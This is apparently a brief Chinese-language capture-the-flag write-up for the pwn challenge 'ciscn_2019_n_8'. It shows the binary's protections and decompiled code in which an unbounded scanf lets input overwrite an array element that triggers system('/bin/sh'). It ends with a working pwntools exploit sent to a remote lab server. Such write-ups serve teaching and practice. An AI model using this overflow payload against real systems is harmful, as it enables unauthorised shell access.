ciscn_2019_n_8
先检查文件保护
Arch: i386-32-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
32位程序,保护全开满,ida分析
var[13] = 0;
var[14] = 0;
init();
puts("What's your name?");
__isoc99_scanf("%s", var, v4, v5);
if ( *(_QWORD *)&var[13] )
{
if ( *(_QWORD *)&var[13] == 17LL )
system("/bin/sh");
else
printf(
"something wrong! val is %d",
var[0],
var[1],
var[2],
var[3],
var[4],
var[5],
var[6],
var[7],
var[8],
var[9],
var[10],
var[11],
var[12],
var[13],
var[14]);
}
else
{
printf("%s, Welcome!
", var);
puts("Try do something~");
}
return 0;
}
有点意外,竟然是数组赋值就能打通
from pwn import *
r = remote('node3.buuoj.cn',28597)
payload = 'a'*13*4+p64(17)
r.sendline(payload)
r.interactive()